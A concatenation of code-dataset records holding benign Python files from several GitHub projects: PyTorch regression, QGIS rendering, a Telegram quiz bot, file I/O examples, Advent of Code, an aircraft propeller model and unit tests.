print('.',end='')\r\n yhat=self.forward(x)\r\n \r\n closs=self.loss(yhat,y)\r\n closs.backward()\r\n self.w.data=self.w.data-self.lr*self.w.grad.data\r\n self.b.data=self.b.data-self.lr*self.b.grad.data\r\n self.w.grad.data.zero_()\r\n self.b.grad.data.zero_()\r\n return closs\r\n\r\nclass StochasticModel():\r\n def __init__(self,lr=0.1):\r\n self.w=torch.randn(1).requires_grad_()\r\n self.b=torch.randn(1).requires_grad_()\r\n 
self.lr=lr\r\n def forward(self, x):\r\n yhat=self.w*x + self.b\r\n return yhat\r\n\r\n def loss(self,yhat,y):\r\n return torch.mean((yhat-y)**2)\r\n def fit(self,loader,iterations=10,lossList=[]):\r\n \r\n for i in range(iterations): \r\n print('.',end='')\r\n localLoss=[] \r\n for x,y in loader:\r\n yhat=self.forward(x)\r\n \r\n closs=self.loss(yhat,y)\r\n closs.backward()\r\n self.w.data=self.w.data-self.lr*self.w.grad.data\r\n self.b.data=self.b.data-self.lr*self.b.grad.data\r\n self.w.grad.data.zero_()\r\n self.b.grad.data.zero_()\r\n localLoss.append(closs)\r\n lossList = torch.mean(torch.tensor(localLoss))\r\n \r\n \r\n return lossList \r\n\r\n\r\nclass Data(Dataset):\r\n def __init__(self,x,y):\r\n # self.x = torch.arange(-3, 3, 0.1).view(-1, 1)\r\n # self.y = 1 * self.x - 1\r\n self.x=x\r\n self.y=y\r\n self.len = x.shape[0]\r\n \r\n # Getter\r\n def __getitem__(self,index): \r\n return self.x[index], self.y[index]\r\n \r\n # Return the length\r\n def __len__(self):\r\n return self.len\r\n \r\n\r\ndef createData():\r\n X=torch.arange(-3,3,0.02).view(-1,1)\r\n f=0.3*X+3\r\n \r\n Y=f+torch.randn(X.size())*torch.randn(X.size())*0.2\r\n plt.plot(X.numpy(),f.numpy(),label='f')\r\n plt.plot(X.numpy(),Y.numpy(),'rx',label='y')\r\n plt.show()\r\n return [X,Y]\r\n\r\ndef train_model_BGD(model,optimizer,trainloader,iter=10):\r\n for epoch in range(iter):\r\n for x,y in trainloader:\r\n yhat = model(x)\r\n loss = model.loss(yhat, y)\r\n optimizer.zero_grad()\r\n loss.backward()\r\n\r\n optimizer.step()\r\nif __name__ == \"__main__\":\r\n [X,Y]=createData()\r\n print(\"starting learning\")\r\n model=basiclr1DModel()\r\n loss=[]\r\n iterations=20\r\n print('training.')\r\n for i in range(iterations):\r\n closs=model.fit(X,Y)\r\n loss.append(closs)\r\n\r\n #stochastic one\r\n print(\"loading data for round 2\")\r\n data=Data(X,Y)\r\n dataloader=DataLoader(dataset=data,batch_size=1)\r\n dataloader2=DataLoader(dataset=data,batch_size=5)\r\n print(\"running with batch size 1\")\r\n\r\n stochasticModel1=StochasticModel()\r\n l1=stochasticModel1.fit(dataloader,iterations)\r\n print(\"running with batch size 10\")\r\n\r\n stochasticModel2=StochasticModel()\r\n lr2=[]\r\n for i in dataloader2:\r\n print(\".\",end='')\r\n p=stochasticModel2.fit(dataloader2,iterations=2,lossList=lr2)\r\n lr2.append(p)\r\n\r\n plt.plot(range(iterations),loss,label='whole data')\r\n plt.plot(l1,label='batch size 1')\r\n plt.plot(lr2,label='batch size 10')\r\n\r\n plt.show()\r\n plt.plot(X,Y,'rx',label='original')\r\n Yhat=model.forward(X)\r\n plt.plot(X,Yhat.detach().numpy(),label='predicted batch')\r\n Yhat=stochasticModel1.forward(X)\r\n plt.plot(X,Yhat.detach().numpy(),label='1 batch')\r\n Yhat=stochasticModel2.forward(X)\r\n \r\n plt.plot(X,Yhat.detach().numpy(),label='10 batch')\r\n\r\n plt.show()\r\n\r\n\r\n #pytorch way\r\n model=withPytorch(1,1)\r\n optimizer = optim.SGD(model.parameters(), lr = 0.01)\r\n\r\n dataloader=DataLoader(dataset=data,batch_size=1)\r\n model.state_dict()['linear.weight'][0] = -15\r\n model.state_dict()['linear.bias'][0] = -10\r\n train_model_BGD(model,optimizer=optimizer,trainloader=dataloader)\r\n Yhat=model.forward(X)\r\n plt.plot(X,Y,'rx',label='original')\r\n \r\n plt.plot(X,Yhat.detach().numpy(),label='pytorch one')\r\n plt.show()\r\n","repo_name":"shubhamwert/Machine_Learning_Collection","sub_path":"IBM_pytorch/lr1D.py","file_name":"lr1D.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 
+{"seq_id":"12298695039","text":"from PyQt4.QtCore import *\nfrom PyQt4.QtGui import *\nfrom qgis.core import *\n\n# to be used inside the Python console\n# does not reproject, does not render text and does not render raster layers\n# does not lint\n# but makes clear-cut borders\n\nmyextent = QgsRectangle(-179.999, -89.999, 179.999, 89.999)\n# myextent = QgsRectangle (-179.999,-85, 179.999, 85)\n\ncrs = QgsCoordinateReferenceSystem()\ncrs = QgsCoordinateReferenceSystem(\n 54004, QgsCoordinateReferenceSystem.EpsgCrsId)\n\nrenderer = QgsMapRenderer()\nrenderer.setDestinationCrs(crs)\nrenderer.setProjectionsEnabled(True)\nlayers = QgsMapLayerRegistry.instance().mapLayers()\nlst = layers.keys()\nrenderer.setLayerSet(lst)\nrenderer.setExtent(myextent)\n\nlayers = iface.mapCanvas().layers()\n\nmasterlayer = QgsMapLayerRegistry.instance().mapLayersByName(\n \"10m_admin_0_scale_ranks_with_minor_islands\")[0]\n\n\n# crs = QgsCoordinateReferenceSystem()\n# crs.createFromProj4(\"+proj=merc +a=6378137 +b=6378137 +lat_ts=0.0 +lon_0=0.0 +x_0=0.0 +y_0=0 +k=1.0 +units=m +nadgrids=@null +wktext +no_defs\")\n# crs.createFromProj4(\"+proj=merc +lon_0=0 +k=1 +x_0=0 +y_0=0 +datum=WGS84 +units=m +no_defs\")\n# crs = QgsCoordinateReferenceSystem(54004, QgsCoordinateReferenceSystem.EpsgCrsId)\n# 54004\n# 3395\n\np = QPainter()\n\nimg = QImage(QSize(720, 360), QImage.Format_ARGB32_Premultiplied)\nimg.fill(QColor(255, 255, 255).rgb())\np.begin(img)\np.setRenderHint(QPainter.Antialiasing)\nrenderer.setOutputSize(img.size(), img.logicalDpiX())\nrenderer.render(p)\np.end()\nimg.save(\"render.png\", \"png\")\n","repo_name":"cprima/sunlightmap","sub_path":"application/physical/GIS/mypyqgis.py","file_name":"mypyqgis.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"17614632753","text":"__doc__ = '''\nEdit User date format to comply with ZEN-28191\n\n$Id:$\n'''\n\nimport logging\nlog = logging.getLogger(\"zen.migrate\")\nimport Migrate\n\n\nclass UpdateUserDatetimeSettings(Migrate.Step):\n version = Migrate.Version(200, 0, 1)\n\n def cutover(self, dmd):\n df_map = {\n 'YY/MM/DD': 'YYYY/MM/DD',\n 'DD/MM/YY': 'DD/MM/YYYY',\n 'MM/DD/YY': 'MM/DD/YYYY'\n }\n\n for usr in dmd.ZenUsers.getAllUserSettings():\n if usr.dateFormat in df_map:\n log.info(\n 'update user %s dateFormat from %s to %s',\n usr.id, usr.dateFormat, df_map[usr.dateFormat]\n )\n usr.dateFormat = df_map[usr.dateFormat]\n\n\nUpdateUserDatetimeSettings()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenModel/migrate/UpdateUserDatetimeSettings.py","file_name":"UpdateUserDatetimeSettings.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"828069604","text":"from random import Random\n\nfrom Events.Game.gameState import GameState\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.enum.enumStatus import UavStatus\nfrom Events.Game.move.algos.GameObjects.movableObject import MovableObject\nfrom Events.Game.move.algos.GameObjects.data_lists.tools.settings import Settings\n\n\nclass Event():\n def __init__(self, time_of_event, event_owner,tk_master,game_state):\n self.time_of_event=time_of_event\n\n self.event_owner:MovableObject=event_owner\n self.visualisation_delay=1\n self.game_state:GameState=game_state\n self.tk_master=tk_master\n\n def handle_event(self,event_list,settings:Settings,rand:Random,iteration_function):\n 
self.event_owner.delete_current_event(event_list)\n\n\n self.event_owner.set_status(self.event_owner.next_status)\n self.event_owner.set_new_position(self.event_owner.target_position,self.time_of_event)\n if settings.visualisation in [1,2] and not settings.is_multirun and not self.game_state.is_training:\n self.tk_master.after(self.visualisation_delay,iteration_function)\n\n\n\n\n\n","repo_name":"vatrasar/masterthessis2","sub_path":"Events/event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"260974635","text":"# coding: utf-8\n\n\nclass MyException(Exception):\n pass\n\n\ndef read_demo1():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n chunk = 100\n while True:\n content = file.read(chunk)\n if not content:\n break\n file_content += content\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo2():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n limit = 1000\n while True:\n content = file.readline(limit)\n if not content:\n break\n file_content += content\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo3():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n lines = file.readlines()\n for line in lines:\n file_content += line\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef read_demo4():\n file_content = ''\n file_name = '文件.py'\n try:\n with open(file_name, mode='r', encoding='utf-8') as file:\n for line in file:\n file_content += line\n print(file_content)\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 读取完成')\n finally:\n print('最终处理逻辑')\n\n\ndef write_demo1():\n file_name = 'xxx.txt'\n try:\n with open(file_name, mode='a', encoding='utf-8') as file:\n file.write('Hello World')\n file.writelines(['111\\n', '222\\n', '333\\n'])\n except FileNotFoundError as err:\n print(f'{file_name} 未找到 {err}')\n else:\n print(f'{file_name} 写入完成')\n finally:\n print('最终处理逻辑')\n\n\ndef copy_file(src, dist):\n chunk = 1024 * 10\n try:\n with open(src, mode='rb') as old_file:\n try:\n with open(dist, mode='wb') as new_file:\n while True:\n content = old_file.read(chunk)\n if not content:\n break\n new_file.write(content)\n except FileNotFoundError as err:\n print(f'{dist} 文件无法创建, {err}')\n except FileNotFoundError as err:\n print(f'{src} 文件不存在, {err}')\n\n\nif __name__ == '__main__':\n old_file_name = r'C:\\Users\\zjw\\Downloads\\黑马python\\python就业班\\01 网络编程\\02-udp\\04-udp发送数据的强调.flv'\n new_file_name = r'C:\\Users\\zjw\\Desktop\\xxx.flv'\n copy_file(old_file_name, new_file_name)\n","repo_name":"similove/python-study","sub_path":"文件.py","file_name":"文件.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23409750866","text":"import logging\n\nfrom zeam import component\nfrom zeam.form.base.interfaces import IFormData\nfrom zeam.form.silva.interfaces import IXMLFormSerialization\nfrom 
zeam.form.silva.interfaces import IXMLFieldSerializer\nfrom zeam.form.silva.interfaces import IXMLFieldDeserializer\nfrom Products.Formulator.Errors import ValidationError\nfrom Products.Formulator.zeamsupport import IFormulatorField\n\nlogger = logging.getLogger('silva.core.xml')\n\n\nclass FieldSerializer(component.Component):\n \"\"\"Make possible to serialize a field in XML.\n \"\"\"\n component.adapts(IFormulatorField, IFormData)\n component.provides(IXMLFieldSerializer)\n\n def __init__(self, field, form, value):\n self.identifier = field.identifier\n self.field = field._field\n self.form = form\n self.value = value\n\n def serialize(self, producer):\n if self.value is not None:\n self.field.validator.serializeValue(\n self.field, self.value, producer)\n\n def __call__(self, producer):\n self.serialize(producer)\n\n\nclass FieldDeserializer(component.Component):\n \"\"\"Make possible to deserialize a field in XML.\n \"\"\"\n component.adapts(IFormulatorField, IFormData)\n component.provides(IXMLFieldDeserializer)\n\n def __init__(self, field, form):\n self.identifier = field.identifier\n self.field = field._field\n self.form = form\n\n def deserialize(self, data, context=None):\n try:\n return self.field.validator.deserializeValue(\n self.field, data, context=context)\n except ValidationError as error:\n logger.error(\n u'Cannot set Formulator field value %s: %s',\n self.field.getId(), str(error.error_text))\n\n def write(self, value):\n self.form.getContentData().set(self.identifier, value)\n\n def __call__(self, data, context=None):\n self.write(self.deserialize(data, context=context))\n\n\nclass XMLFormSerialization(component.Component):\n component.adapts(IFormData)\n component.provides(IXMLFormSerialization)\n\n def __init__(self, form):\n self.form = form\n\n def getSerializers(self):\n form = self.form\n assert form.getContent() is not None\n content = form.getContentData()\n for field in form.fields:\n try:\n value = content.get(field.identifier)\n except KeyError:\n continue\n factory = component.getComponent(\n (field, form), IXMLFieldSerializer)\n yield factory(field, form, value)\n\n def getDeserializers(self):\n form = self.form\n deserializers = {}\n for field in form.fields:\n deserializers[field.identifier] = component.getWrapper(\n (field, form), IXMLFieldDeserializer)\n return deserializers\n","repo_name":"silvacms/zeam.form.silva","sub_path":"src/zeam/form/silva/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":2841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995265474","text":"\"\"\"\r\nentradas\r\nP-->int-->p\r\nQ-->int-->q\r\ncaja negra\r\nexpresión-->int-->e\r\nsalidas\r\nsatisface o no satisface la expresión-->int-->s\r\n\"\"\"\r\n#entradas\r\np=int(input(\"Digite P:\"))\r\nq=int(input(\"Digite Q:\"))\r\n#caja negra\r\ne=(p**3)+(q**4)-(2*(p**2))\r\ns=\"\"\r\nif(e>680):\r\n s=(f\"{p} y {q} satisfacen la expresion\")\r\nelse:\r\n s=(f\"{p} y {q} no satisfacen la expresion\")\r\n #salidas\r\nprint(s)","repo_name":"Jcetina2212/Tallerestructuradecontrolselectivo","sub_path":"Ejercicio8.py","file_name":"Ejercicio8.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7519883144","text":"import logging\n\nfrom telegram import ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, MessageHandler, Filters, CommandHandler, ConversationHandler\nfrom json import 
load\nfrom random import choice\n\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.DEBUG\n)\n\nlogger = logging.getLogger(__name__)\n\nTOKEN = ''\n\n\ndef start(update, context):\n # update.message.reply_text(\"Предлагаю пройти опрос\")\n with open('тестирующая_система.json') as f:\n f = load(f)\n d_first = choice(f['test'])\n f['test'].remove(d_first)\n context.user_data['questions'] = f['test']\n context.user_data['response'] = d_first['response']\n context.user_data['corr_response'] = 0\n update.message.reply_text(d_first['question'])\n return 1\n\n\ndef user_response(update, context):\n if not context.user_data['questions']:\n update.message.reply_text(f'Ваш результат: {context.user_data[\"corr_response\"]}\\n'\n f'Чтобы попробовать ещё раз введите /start')\n return ConversationHandler.END\n if update.message.text.lower() == context.user_data['response'].lower():\n context.user_data['corr_response'] += 1\n t = choice(context.user_data['questions'])\n context.user_data['questions'].remove(t)\n context.user_data['response'] = t['response']\n update.message.reply_text(t['question'])\n return 1\n\n\ndef stop(update, context):\n update.message.reply_text(\"Всего доброго!\")\n return ConversationHandler.END\n\n\ndef main():\n updater = Updater(TOKEN)\n dp = updater.dispatcher\n\n conv_handler = ConversationHandler(\n # Точка входа в диалог.\n # В данном случае — команда /start. Она задаёт первый вопрос.\n entry_points=[CommandHandler('start', start)],\n\n states={\n 1: [MessageHandler(Filters.text, user_response)],\n },\n # Точка прерывания диалога. В данном случае — команда /stop.\n fallbacks=[CommandHandler('stop', stop)]\n )\n\n dp.add_handler(conv_handler)\n # dp.add_handler(CommandHandler('start', start))\n updater.start_polling()\n # Ждём завершения приложения.\n # (например, получения сигнала SIG_TERM при нажатии клавиш Ctrl+C)\n updater.idle()\n\n\n# Запускаем функцию main() в случае запуска скрипта.\nif __name__ == '__main__':\n main()","repo_name":"dm1itri/telegram_bot","sub_path":"Бот «Тестирующая система».py","file_name":"Бот «Тестирующая система».py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39740695131","text":"import algo.matrix_util as mu\nimport itertools\nimport numpy as np\nimport unittest\n\nLIT = \"1\"\nUNLIT = \"0\"\nTO_BIT = {\"#\": LIT, \".\": UNLIT}\nINIT_SIZE = 1000\n\ndef expand_array(arr, fill_char):\n nr, nc = arr.shape\n\n # Add columns first.\n new_col = np.full((nr, 1), fill_char)\n arr = np.concatenate((new_col, arr, new_col), axis=1)\n\n # Then add rows.\n new_row = np.full((1, nc+2), fill_char)\n arr = np.concatenate((new_row, arr, new_row), axis=0)\n return arr\n\ndef parse_input(path_in):\n with open(path_in, 'r') as f:\n input = f.read().split()\n enhance_str = \"\".join(map(lambda c: TO_BIT[c], input[0]))\n img = np.array([list(s) for s in input[1:]])\n to_bit = np.vectorize(lambda c: TO_BIT[c])\n img = to_bit(img)\n img = expand_array(img, UNLIT)\n return (enhance_str, img)\n\ndef get_test_cases():\n num_cases = 1\n if num_cases == 1:\n cases = [\"input20_test.txt\"]\n else:\n num_cases_to_test = 1\n cases = [\"input20_test%s.txt\" % (case+1) for case in range(num_cases_to_test)]\n return cases\n\ndef solve(f):\n input = parse_input(\"input20.txt\")\n return f(*input)\n\n####################### Day 20.1: Trench Map #######################\ndef to_pixels(img):\n to_pixel = {}\n for k, v in 
TO_BIT.items():\n to_pixel[v] = k\n to_pixel_func = np.vectorize(lambda c: to_pixel[c])\n img = to_pixel_func(img)\n return \"\\n\".join([\"\".join(row) for row in img])\n\ndef count_lit(img):\n return len(img[img == LIT])\n\ndef step(enhance_str, img):\n void_char = img[0][0]\n next_void_char = enhance_str[0 if void_char == UNLIT else -1]\n\n def next_bit(img, r, c):\n row_in_range = mu.in_range((0, len(img)))\n col_in_range = mu.in_range((0, len(img[0])))\n bits = []\n # for ar, ac in itertools.product(range(r-1, r+2), range(c-1, c+2)):\n for ar in range(r-1, r+2):\n for ac in range(c-1, c+2):\n if row_in_range(ar) and col_in_range(ac):\n bits.append(img[ar][ac])\n else:\n bits.append(void_char)\n enhance_ind = int(\"\".join(bits), 2)\n return enhance_str[enhance_ind]\n\n new_img = img.copy()\n for r, c in itertools.product(range(len(img)), range(len(img[0]))):\n new_img[r][c] = next_bit(img, r, c)\n\n new_img = expand_array(new_img, next_void_char)\n return new_img\n\ndef part1(enhance_str, img):\n num_steps = 2\n # print(to_pixels(img))\n for i in range(num_steps):\n img = step(enhance_str, img)\n return count_lit(img)\n\nclass Part1Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != part1:\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n\n def test_part1(self):\n cases = get_test_cases()\n expecteds = [35]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part1(*parse_input(case))\n self.assertEqual(expected, actual)\n\n####################### Day 20.2: Trench Map #######################\ndef part2(enhance_str, img):\n num_steps = 50\n # print(to_pixels(img))\n for i in range(num_steps):\n img = step(enhance_str, img)\n return count_lit(img)\n\nclass Part2Test(unittest.TestCase):\n def setUp(self):\n if FUNC_TO_TEST != part2:\n self.skipTest(f\"Testing: {FUNC_TO_TEST}()\")\n\n def test_part2(self):\n cases = get_test_cases()\n expecteds = [3351]\n for case, expected in zip(cases, expecteds):\n with self.subTest(case=case):\n actual = part2(*parse_input(case))\n self.assertEqual(expected, actual)\n\n############################### Main ###############################\nFUNC_TO_TEST = part2\n\nif __name__ == \"__main__\":\n # unittest.main()\n print(solve(FUNC_TO_TEST))\n","repo_name":"wxiang54/advent-of-code","sub_path":"2021/20/q20.py","file_name":"q20.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33546440144","text":"import requests\nimport datetime\nimport calendar\nimport xml.etree.ElementTree as ET\n\nimport pymysql\nfrom pymysql.cursors import DictCursor\n\nconnection = pymysql.connect(\n host='localhost',\n user='kommunar',\n password='123',\n db='price',\n charset='utf8mb4',\n cursorclass=DictCursor\n)\n\n# 2015 -09 -23\nfor y in range(2017,2020):\n for m in range(1,13):\n for d in range(1, 32):\n params = {'date_req':'{:02}.{:02}.{}'.format(d,m,y)}\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp', params = params)\n\n root = ET.fromstring(response.text)\n\n for idx,Valute_element in enumerate(root.findall('Valute')):\n\n NumCode = Valute_element.find('NumCode').text\n CharCode = Valute_element.find('CharCode').text\n Nominal = Valute_element.find('Nominal').text\n Name = Valute_element.find('Name').text\n Value2 = Valute_element.find('Value').text\n\n if CharCode == 'USD':\n query = \"INSERT INTO price.valuta(NumCode, CharCode, dateCalendar, ValueVal, Nominal) \" \\\n \"VALUES(%s,%s,%s,%s,%s)\"\n 
args = (NumCode, CharCode, datetime.datetime(int(y),int(m),int(d)).strftime('%Y-%m-%d %H:%M:%S'), float(Value2.replace(',','.')), int(Nominal))\n cursor = connection.cursor()\n cursor.execute(query, args)\n connection.commit()\n\nconnection.close()","repo_name":"Kommunarus/RosStat","sub_path":"parsing/parsCursValut.py","file_name":"parsCursValut.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23447908511","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\ndef solve(cipher):\n inputs = cipher.split()\n max_shyness = inputs[0]\n accum = 0\n invites = 0\n for shyness, num in enumerate (inputs[1]):\n if accum < shyness:\n new_invite = shyness - accum\n invites += new_invite\n accum += new_invite + int(num)\n else:\n accum += int(num)\n return invites\n\nif __name__ == \"__main__\":\n testcases = input()\n\n for caseNr in xrange(1, testcases+1):\n cipher = raw_input()\n print(\"Case #%i: %s\" % (caseNr, solve(cipher)))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_155/1052.py","file_name":"1052.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38836421913","text":"## @ingroup Components-Energy-Converters\n# Propeller_Lo_Fid.py\n#\n# Created: Jun 2014, E. Botero\n# Modified: Jan 2016, T. MacDonald\n\n# ----------------------------------------------------------------------\n# Imports\n# ----------------------------------------------------------------------\n\n# suave imports\nimport SUAVE\n\n# package imports\nimport numpy as np\nfrom SUAVE.Components.Energy.Energy_Component import Energy_Component\nfrom warnings import warn\n\n# ----------------------------------------------------------------------\n# Propeller Class\n# ---------------------------------------------------------------------- \n## @ingroup Components-Energy-Converters\nclass Propeller_Lo_Fid(Energy_Component):\n \"\"\"This is a low-fidelity propeller component.\n \n Assumptions:\n None\n\n Source:\n None\n \"\"\" \n def __defaults__(self):\n \"\"\"This sets the default values for the component to function.\n\n Assumptions:\n None\n\n Source:\n N/A\n\n Inputs:\n None\n\n Outputs:\n None\n\n Properties Used:\n None\n \"\"\" \n self.tip_radius = 0.0\n self.propulsive_efficiency = 0.0\n\n \n def spin(self,conditions):\n \"\"\"Analyzes a propeller given geometry and operating conditions.\n\n Assumptions:\n per source\n\n Source:\n Qprop theory document\n\n Inputs:\n self.inputs.omega [radian/s]\n self.inputs.torque [Nm]\n conditions.freestream.\n density [kg/m^3]\n dynamic_viscosity [kg/(m-s)]\n velocity [m/s]\n speed_of_sound [m/s]\n temperature [K]\n\n Outputs:\n conditions.propulsion.etap [-] (propulsive efficiency)\n thrust [N]\n Qm [Nm] (torque)\n power [W]\n Cp [-] (coefficient of power)\n\n Properties Used:\n self.tip_radius [m]\n self.propulsive_efficiency [-]\n \"\"\" \n \n # Unpack \n R = self.tip_radius\n etap = self.propulsive_efficiency\n omega = self.inputs.omega\n Qm = self.inputs.torque\n rho = conditions.freestream.density[:,0,None]\n mu = conditions.freestream.dynamic_viscosity[:,0,None]\n V = conditions.freestream.velocity[:,0,None]\n a = conditions.freestream.speed_of_sound[:,0,None]\n T = conditions.freestream.temperature[:,0,None]\n \n # Do very little calculations\n power = Qm*omega\n n = omega/(2.*np.pi) \n D = 2*R\n \n thrust = etap*power/V\n \n Cp = 
power/(rho*(n*n*n)*(D*D*D*D*D))\n conditions.propulsion.etap = etap\n \n return thrust, Qm, power, Cp\n","repo_name":"suavecode/SUAVE","sub_path":"trunk/SUAVE/Components/Energy/Converters/Propeller_Lo_Fid.py","file_name":"Propeller_Lo_Fid.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"61"} +{"seq_id":"29988995838","text":"#Regular calculation modules.\nimport numpy as np \nimport scipy as sp \n#Allows a debug-output stream.\nimport sys as sys \n#Physical constants list.\nfrom scipy.constants import *\n#Time differences.\nimport time as time \n#Command line arguments.\nimport argparse as argparse \n\n#griddata to format data\nfrom matplotlib.mlab import griddata \n\n#cycler will cause a colour cycle automatically\nfrom cycler import cycler \n#pyplot is simple plotting\nimport matplotlib.pyplot as plt \nfrom matplotlib.colors import BoundaryNorm\nfrom matplotlib.ticker import MaxNLocator\n#Commandline arguments instruction.\n\nparser = argparse.ArgumentParser(prog=\"Contour Plot\",\n description = \"Filename for contour plot.\")\nparser.add_argument(\n '-f',\n '--filename',\n help='File to plot',\n action='store',\n type = str,\n default = 'transport.txt'\n) \nargs = parser.parse_args() \nfilename = args.filename\n\n\nfile_handler = open( filename, \"r\" );\n\ndata = np.genfromtxt(file_handler, dtype=None, usecols=range(0,4)); #excluding the symtype col\n\n\nbetaFraction = data[:,0];\n\nbeta = data[:,0]; #betaFraction, actually. kT/U\nepsilon = data[:,2];\ntransport = data[:,3]; \n\n\nlin_b = np.linspace(min(beta), max(beta), 10)\n#lin_e = np.linspace(min(epsilon), max(epsilon), 2500)\nlin_e = np.linspace(-.15, .5, 2500);\n\nx, y = np.meshgrid(lin_b, lin_e)\nz = griddata(beta, epsilon, transport, lin_b, lin_e, interp='linear')\n\nepsilonArray = y[:, 0];\n\nplt.rc('axes', prop_cycle=(cycler('color', ['r', 'g', 'b', 'c', 'm','k'])));\nfig, ax = plt.subplots();\nax.plot(y, z + x/10.00); \nax.set_xlabel( \"epsilon\" ,fontsize=30); \nax.set_ylabel( \"T(e) + beta/10\" ,fontsize=30); \n#ax.legend(['kT=%.3f [U]' % b for b in x[0, :]], loc='upper center', ncol=10, bbox_to_anchor=(.5, 1.15));\nplt.show (); ","repo_name":"daimonie/selfconsistentcapacitivegreen","sub_path":"transportPlot.py","file_name":"transportPlot.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3086824950","text":"from tkpy.buildings import Buildings\nfrom tkpy.buildings import BuildingQueue\nfrom tkpy.buildings import ConstructionList\nfrom tkpy.enums.building import BuildingType\nimport unittest\nimport requests_mock\nimport pickle\nimport json\n\n\nclass TestBuildings(unittest.TestCase):\n def testing_buildings(self):\n with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n g = pickle.load(f)\n\n with open(\"./tests/unit/fixtures/buildings_raw.json\", \"r\") as f:\n buildings_raw = json.load(f)\n\n with requests_mock.mock() as mock:\n mock.register_uri(\n \"POST\", \"https://com1.kingdoms.com/api/\", json=buildings_raw\n )\n b = Buildings(g, 536461288)\n b.pull()\n self.assertEqual(len(b[BuildingType.CROPLAND]), 6)\n self.assertEqual(len(b.freeSlots), 8)\n self.assertEqual(len(list(b.raw)), 40)\n self.assertEqual(b[BuildingType.CROPLAND][0].id, \"4\")\n self.assertEqual(b[BuildingType.CROPLAND][0][\"buildingType\"], \"4\")\n self.assertEqual(b[BuildingType.CROPLAND][0].location, \"2\")\n 
self.assertEqual(b[BuildingType.CROPLAND][0].lvl, 6)\n            self.assertFalse(b[BuildingType.CROPLAND][0].is_max_level)\n            self.assertEqual(\n                b[BuildingType.CROPLAND][0].upgrade_cost,\n                {\"1\": 1625, \"2\": 1950, \"3\": 1845, \"4\": 0},\n            )\n            with self.assertRaises(KeyError):\n                b[BuildingType.CROPLAND][0][\"KeyError\"]\n\n            with self.assertRaises(TypeError):\n                b[\"NotABuildingType\"]\n\n        with requests_mock.mock() as mock:\n            mock.register_uri(\n                \"POST\", \"https://com1.kingdoms.com/api/\", json={\"mock\": \"mocked\"}\n            )\n            r = b[BuildingType.CROPLAND][0].upgrade()\n            self.assertEqual(r, {\"mock\": \"mocked\"})\n            r = b[BuildingType.CROPLAND][0].queues(reserveResources=False)\n            self.assertEqual(r, {\"mock\": \"mocked\"})\n\n    def testing_building_queue(self):\n        with open(\"./tests/unit/fixtures/pickled_driver.py\", \"rb\") as f:\n            g = pickle.load(f)\n\n        with open(\"./tests/unit/fixtures/building_queue_raw.json\", \"r\") as f:\n            building_queue_raw = json.load(f)\n\n        with requests_mock.mock() as mock:\n            mock.register_uri(\n                \"POST\", \"https://com1.kingdoms.com/api/\", json=building_queue_raw\n            )\n            bq = BuildingQueue(g, 536461288)\n            bq.pull()\n            self.assertEqual(bq.freeSlots, {\"1\": 1, \"2\": 1, \"4\": 1})\n            self.assertEqual(bq.queues, {\"1\": [], \"2\": 